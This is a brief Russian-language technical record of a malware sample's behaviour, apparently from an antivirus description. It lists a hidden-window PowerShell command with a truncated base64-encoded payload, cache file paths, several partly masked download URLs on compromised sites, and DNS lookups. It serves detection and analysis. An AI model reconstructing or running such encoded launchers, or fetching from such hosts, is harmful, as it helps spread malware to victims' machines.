Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -nop -e JABMADIATQB3AEIANABaAD0AJwBGADYAYwBjAHUAWAA4ACcAOwAkAHIANwBuAF8AWQBuACAAPQAgACcAOAAwADgAJwA7ACQAUABLADcAQgBrAHAAPQAnAHEAUgBwAHcAQQBIAGgASQAnADsAJABVAGIAbQBGAEoAWgA9ACQAZQBuAHYAOgB1AHMAZ...
- %WINDIR%\serviceprofiles\networkservice\appdata\locallow\microsoft\cryptneturlcache\metadata\f0accf77cdcbff39f6191887f6d2d357
- %WINDIR%\serviceprofiles\networkservice\appdata\locallow\microsoft\cryptneturlcache\content\f0accf77cdcbff39f6191887f6d2d357
- http://www.th###new.com/wp-includes/h8/
- http://c-###homes.com/wp-includes/kp4z5672/
- http://ce###moroy.com/imagen_OLD/dg38/
- http://fq###pers.com/sitemaps/f5q65143/
- DNS ASK th###new.com
- DNS ASK c-###homes.com
- DNS ASK ce###moroy.com
- DNS ASK fq###pers.com
- DNS ASK my####ycoins.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -nop -e JABMADIATQB3AEIANABaAD0AJwBGADYAYwBjAHUAWAA4ACcAOwAkAHIANwBuAF8AWQBuACAAPQAgACcAOAAwADgAJwA7ACQAUABLADcAQgBrAHAAPQAnAHEAUgBwAHcAQQBIAGgASQAnADsAJABVAGIAbQBGAEoAWgA9ACQAZQBuAHYAOgB1AHMAZ...' (со скрытым окном)